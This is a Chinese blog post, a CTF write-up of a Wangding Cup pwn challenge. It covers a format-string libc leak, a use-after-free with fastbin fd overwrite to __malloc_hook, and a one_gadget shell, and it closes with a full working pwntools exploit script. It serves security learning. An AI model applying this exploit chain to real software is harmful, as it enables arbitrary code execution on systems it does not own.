<!DOCTYPE html>
<html lang="en">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Paxos">
  <meta name="keywords" content="">
  <title>从网鼎杯白虎组pwn（云盾）学习UAF与fastbin attack - ScUpax0s</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/dracula.min.css" />
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_yg9cfy8wd6.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
<meta name="generator" content="Hexo 4.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Fluid</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
  <div class="mt-3 post-meta">
    <i class="iconfont icon-date-fill" aria-hidden="true"></i>
    <time datetime="2020-05-21 23:07">
      May 21, 2020 pm
    </time>
  </div>


<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.3k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      16
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <div class="post-content mx-auto" id="post">
            
            <article class="markdown-body">
              <h2 id="0x00-知识点概览"><a href="#0x00-知识点概览" class="headerlink" title="0x00 知识点概览"></a>0x00 知识点概览</h2><ul>
<li>fastbin结构，fd指针</li>
<li>UAF的原理</li>
<li>one_gadget<h2 id="0x01-题目概览"><a href="#0x01-题目概览" class="headerlink" title="0x01 题目概览"></a>0x01 题目概览</h2><img src="https://s1.ax1x.com/2020/05/21/YqxP0K.png" srcset="/img/loading.gif" alt=""></li>
<li>他这个实际上就是模拟了linux下的几个操作：vim、cat、rm之类的，然后在这背后实际上vim是新开一个堆（有两种，vim 2开0x30的小chunk；vim 1开0x60的大chunk）。然后rm就是free，<strong>不过free后没有置空，给了我们UAF的机会</strong> <img src="https://s1.ax1x.com/2020/05/21/Yqx3tg.png" srcset="/img/loading.gif" alt=""></li>
<li>有一个需要格外注意的一点，这里有一个格式化字符串，可以用来泄漏地址。<img src="https://s1.ax1x.com/2020/05/21/YqxI4e.png" srcset="/img/loading.gif" alt=""> 但由于他的过滤我们实际只能用%p来泄漏，而这个格式化字符串触发的前提是format == NULL,而format是vim 1的返回值。这就要求我们在vim 1之前先去vim 2然后输入%p再cat 2来泄漏一下地址，这个泄漏出的地址实际上是<code>&lt;_IO_2_1_stdin_+131&gt;</code>，在某次调试中他距离libc基地址的偏移是0x3c4963。由此我们可以拿到加载时libc的基地址。（关于这个函数是干嘛的请看<a href="https://book.51cto.com/art/201701/528133.htm?mobile" target="_blank" rel="noopener">stdin、stdout和stderr</a>）  <img src="https://s1.ax1x.com/2020/05/21/YLSte0.png" srcset="/img/loading.gif" alt=""></li>
<li>这个程序有两个可以打的地方：1.one_gadget 2.secret函数。我们这里基于one_gadget <img src="https://s1.ax1x.com/2020/05/21/YLCme1.png" srcset="/img/loading.gif" alt=""></li>
<li>有一个需要注意的问题，我们查出来的one_gadget并不是每个都能正常用，一般来说比如我们打__malloc_hook函数，后三个是可以用的，但是这道题只有最后一个可以打通。也就是说one_gadget的调用要看实际的栈情况（使用是有条件的，比如 *[rsp+0x70]==NULL*）。如果mallochook打不通，可以尝试打reallochook调整栈空间，然后再跳one_gadget,mallochook的调用指令是jmp,freehook调用的指令是call。详细看这里<a href="https://blog.csdn.net/Maxmalloc/article/details/102535427" target="_blank" rel="noopener">onegadget不起作用s</a><h2 id="0x02-整体思路"><a href="#0x02-整体思路" class="headerlink" title="0x02 整体思路"></a>0x02 整体思路</h2></li>
<li>首先我们通过vim 2，读入%p，cat 2来泄露libc的加载基址</li>
<li>然后我们再vim 2，vim 1申请两个chunk，再rm掉已备后续使用。此时的堆情况如下 <img src="https://s1.ax1x.com/2020/05/22/YLAlMF.png" srcset="/img/loading.gif" alt="">，可以看到一共有三个chunk，然后被我们free了两个，他们在fastbin里（不同的fastbin因为他们大小不一样）由于free后没有置NULL，我们可以UAF。</li>
<li>继续vim2,此时内存中小chunk在上，大chunk在下，我们通过对小chunk进行堆溢出，改写大chunk的fd指针如下：<img src="https://s1.ax1x.com/2020/05/22/YLAlMF.png" srcset="/img/loading.gif" alt=""> <img src="https://s1.ax1x.com/2020/05/22/YLARRf.png" srcset="/img/loading.gif" alt="">,这里应该解释一下，我们是准备替换malloc_hook为one_gadget，此时应该fd应该改写为 <em>malloc_hook-0x13</em>,其实原因就是我们其实是把<strong>malloc_hook那个位置做成了一个fake_chunk，而fake_chunk必须要满足size的验证。可以看这篇文章。[堆漏洞挖掘:28—fastbin attack漏洞之</strong>malloc_hook攻击](<a href="https://blog.csdn.net/qq_41453285/article/details/99321101" target="_blank" rel="noopener">https://blog.csdn.net/qq_41453285/article/details/99321101</a>)</li>
<li>当做好伪chunk后直接vim 1此时因为上一个出fastbin的chunk的fd已经被我们做成了指向<strong>malloc_hook，此时vim 1的话，会直接指向</strong>malloc_hook然后执行被我们替换掉的one_gadget,攻击完成。关于<strong>malloc_hook请看这里[</strong>malloc_hook](<a href="https://eqqie.cn/index.php/laji_note/911/)，当我们换掉了__malloc_hook中原本为NULL的指针，此时会跳转到我们的地址执行，完成劫持。" target="_blank" rel="noopener">https://eqqie.cn/index.php/laji_note/911/)，当我们换掉了__malloc_hook中原本为NULL的指针，此时会跳转到我们的地址执行，完成劫持。</a></li>
</ul>
<p><em>其实<strong>malloc_hook相当于给malloc函数套了一层外壳，当这个函数指针的值不为NULL时，系统在调用malloc是就会触发这个hook，执行hook所指向的函数。合理构造该函数就可以达到自定义malloc的行为，捕获甚至控制返回值。于是我们想到通过之前的uaf和fastbin相关的知识，把堆块构造到该处便可以修改hook函数为自定义位置的函数，达到getshell的目的。类似的还有</strong>free_hook， __realloc_hook 等，原理大同小异</em></p>
<ul>
<li>下面上一张图大家更好理解一些<img src="https://s1.ax1x.com/2020/05/22/YLjBm6.png" srcset="/img/loading.gif" alt=""></li>
</ul>
<h2 id="0x02攻击过程"><a href="#0x02攻击过程" class="headerlink" title="0x02攻击过程"></a>0x02攻击过程</h2><figure class="highlight plain"><table><tr><td class="gutter"><div class="hljs"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></div></td><td class="code"><div class="hljs"><pre><span class="line">vim 2 -&gt; %p -&gt; cat 2 -&gt; 拿到libc地址</span><br><span class="line">-&gt; vim 2 -&gt; vim 1 -&gt; rm 2 -&gt; rm 1 -&gt; vim 2 -&gt; 堆溢出修改vim 1的fd指针指向__malloc_hook</span><br><span class="line">-&gt; vim 1 -&gt; 此时fastbin中的vim 1被拿出来，fastbin指向我们修改后的fd的地址</span><br><span class="line">-&gt; vim 1 -&gt; 写入one_gadget地址，此时__malloc_hook的里地址被换掉了，当再次调用malloc时(也就是vim 1)，会跳转到one_gadget执行。</span><br></pre></div></td></tr></table></figure>
<h2 id="0x03-exp"><a href="#0x03-exp" class="headerlink" title="0x03 exp"></a>0x03 exp</h2><figure class="highlight py"><table><tr><td class="gutter"><div class="hljs"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></div></td><td class="code"><div class="hljs"><pre><span class="line"><span class="comment"># encoding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context.log_level='debug'</span></span><br><span class="line">context.terminal=<span class="string">'/bin/zsh'</span></span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">"./pwn"</span>)</span><br><span class="line">libc = ELF(<span class="string">"./libc-2.23.so"</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">io = process(<span class="string">"./pwn"</span>)</span><br><span class="line"><span class="comment"># attach(io)</span></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">						<span class="comment"># 0x7f00c113d963 - 0x7f00c0d79000</span></span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line">io.sendline(<span class="string">'vim 2'</span>)</span><br><span class="line">io.recvuntil(<span class="string">"&gt; "</span>)</span><br><span class="line">io.sendline(<span class="string">"%p"</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">"&gt; &gt; "</span>)</span><br><span class="line"><span class="comment">#attach(io)</span></span><br><span class="line">io.sendline(<span class="string">"cat 2"</span>)</span><br><span class="line">						<span class="comment"># 第一次当vim 1为空时，利用vim 2 泄漏地址</span></span><br><span class="line">val=io.recvuntil(<span class="string">"\n"</span>)</span><br><span class="line">log.info(hex(int(val,<span class="number">16</span>)))</span><br><span class="line">now = hex(int(val,<span class="number">16</span>))</span><br><span class="line">libc.address = int(now,<span class="number">16</span>) -  <span class="number">0x3c4963</span></span><br><span class="line">log.info(hex(libc.address))</span><br><span class="line">log.info(<span class="string">"leak libc base done!\n"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#====================================</span></span><br><span class="line">io.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line">io.sendline(<span class="string">'vim 2'</span>)</span><br><span class="line">io.recvuntil(<span class="string">"&gt; "</span>)</span><br><span class="line">io.sendline(<span class="string">"ppppp"</span>)</span><br><span class="line">io.recvuntil(<span class="string">"&gt; &gt; "</span>)</span><br><span class="line">io.sendline(<span class="string">'vim 1'</span>)</span><br><span class="line">io.recvuntil(<span class="string">"&gt; "</span>)</span><br><span class="line">io.sendline(<span class="string">"aaaaa"</span>)</span><br><span class="line">io.recvuntil(<span class="string">"&gt; &gt; "</span>)</span><br><span class="line">io.sendline(<span class="string">'rm 2'</span>)</span><br><span class="line">io.recvuntil(<span class="string">"&gt; "</span>)</span><br><span class="line">io.sendline(<span class="string">'rm 1'</span>)</span><br><span class="line">io.recvuntil(<span class="string">"&gt; "</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">io.sendline(<span class="string">'vim 2'</span>)</span><br><span class="line">io.recvuntil(<span class="string">"&gt; "</span>)</span><br><span class="line">malloc_hook = libc.sym[<span class="string">'__malloc_hook'</span>]</span><br><span class="line">log.info(hex(malloc_hook))</span><br><span class="line">log.info(<span class="string">"leak malloc hook done!\n"</span>)</span><br><span class="line">payload = flat(<span class="string">'p'</span>*<span class="number">0x30</span>,p64(<span class="number">0</span>),p64(<span class="number">0x71</span>),p64(malloc_hook<span class="number">-0x13</span>)) <span class="comment"># 从vim1向vim2溢出修改fd指针</span></span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">io.recv()</span><br><span class="line">io.sendline(<span class="string">"vim 1"</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">io.recv()</span><br><span class="line">io.sendline(<span class="string">"a"</span>)</span><br><span class="line">io.recv()</span><br><span class="line"></span><br><span class="line">one_gadgets = libc.address + <span class="number">0xf1147</span></span><br><span class="line">log.info(hex(one_gadgets))</span><br><span class="line">log.info(<span class="string">"one gadgets done."</span>)</span><br><span class="line">payload = flat(<span class="string">'aaa'</span>,p64(one_gadgets))</span><br><span class="line"></span><br><span class="line">io.sendline(<span class="string">"vim 1"</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">io.recv()</span><br><span class="line">io.sendline(payload)</span><br><span class="line">attach(io)</span><br><span class="line">pause()</span><br><span class="line"><span class="comment"># attach(io)</span></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">io.recv()</span><br><span class="line">io.sendline(<span class="string">"vim 1"</span>)</span><br><span class="line">io.interactive()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#vim2 -&gt; cat2 -&gt; vim2 -&gt; vim1 -&gt; rm1 -&gt; rm2 -&gt; vim2 -&gt; vim1 -&gt; vim1 -&gt; vim1</span></span><br></pre></div></td></tr></table></figure>

            </article>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/CTF/">CTF</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E7%BD%91%E9%BC%8E%E6%9D%AF-fastbin-UAF/">网鼎杯 && fastbin && UAF</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" target="_blank" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-6">
                    
                    
                      <a href="/2020/05/22/%E4%B8%BB%E5%8A%A8SSP%E8%A6%86%E7%9B%96argv-0/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">主动SSP覆盖argv[0]</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </div>
                  <div class="post-next col-6">
                    
                    
                      <a href="/2020/05/13/canary%E7%BB%95%E8%BF%87%E4%B8%8EROP-md/">
                        <span class="hidden-mobile">canary绕过与ROP.md</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div>
    

    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: 'article.markdown-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "从网鼎杯白虎组pwn（云盾）学习UAF与fastbin attack&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>




















<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
